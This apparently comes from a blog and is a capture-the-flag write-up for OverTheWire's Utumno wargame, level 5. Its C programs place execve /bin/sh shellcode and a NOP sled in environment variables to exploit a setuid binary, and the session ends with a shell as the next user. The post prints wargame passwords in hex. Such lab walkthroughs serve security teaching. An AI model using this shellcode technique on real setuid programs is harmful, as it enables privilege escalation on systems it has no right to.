hacktracking: # Utumno wargame: Level 5

# Utumno wargame: Level 5

# ssh utumno5@utumno.labs.overthewire.org
utumno5@utumno.labs.overthewire.org's password:776f756361656a69656b

utumno5@melissa$ file /utumno/utumno5
/utumno/utumno5: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno5@melissa$ mkdir /tmp/u5
utumno5@melissa$ cd !$
utumno5@melissa$ cat execve2.c
#include <unistd.h>
int main(){
        char *args[4];
        char *env[12];
        args[0]="/tmp/u5/getenvaddr";
        args[1]="EGG";
        args[2]="/utumno/utumno5";
        args[3]="NULL";
        env[0]=env[1]=env[2]=env[3]=env[4]=env[5]=env[6]=env[7]=env[8]="";
        env[9]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xa1\xa2\xa3\xa4";
        env[10]="EGG=\xb1\xb2\xb3\xb4\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
        env[11]=NULL;
        execve("/tmp/u5/getenvaddr",args,env);
}
utumno5@melissa$ cat getenvaddr.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char *argv[]){
        char *ptr;
        ptr=getenv(argv[1]);
        ptr+=(strlen(argv[0])-strlen(argv[2])); // *2 -> Name only in argv but not in env var
        printf("%s will be at %p\n",argv[1],ptr);
        return 0;
}
utumno5@melissa$ gcc -m32 -o execve2 execve2.c && gcc -m32 -o getenvaddr getenvaddr.c
utumno5@melissa$ ./execve2
EGG will be at 0xffffdfc9
utumno5@melissa$ gdb -q
(gdb) #>address+shellcode
(gdb) print /x 0xffffdfc9 - 0x4
$1 = 0xffffdfc5
(gdb) #>EGG=address+shellcode
(gdb) print /x 0xffffdfc9 + 0x4
$2 = 0xffffdfcd
(gdb) #>shellcode
utumno5@melissa$ cat execve.c
#include <unistd.h>

int main(){
        char *env[12];
        env[0]=env[1]=env[2]=env[3]=env[4]=env[5]=env[6]=env[7]=env[8]="";
        env[9]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc5\xdf\xff\xff";
        env[10]="EGG=\xcd\xdf\xff\xff\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
        env[11]=NULL;
        execve("/utumno/utumno5",NULL,env);
}
utumno5@melissa$ gcc -m32 -o execve execve.c
utumno5@melissa$ ./execve
Here we go - Åßÿÿ
$ /usr/bin/whoami
utumno6
$ /bin/cat /etc/utumno_pass/utumno6
65696c75717569657468
# Utumno wargame: Level 5

No comments:
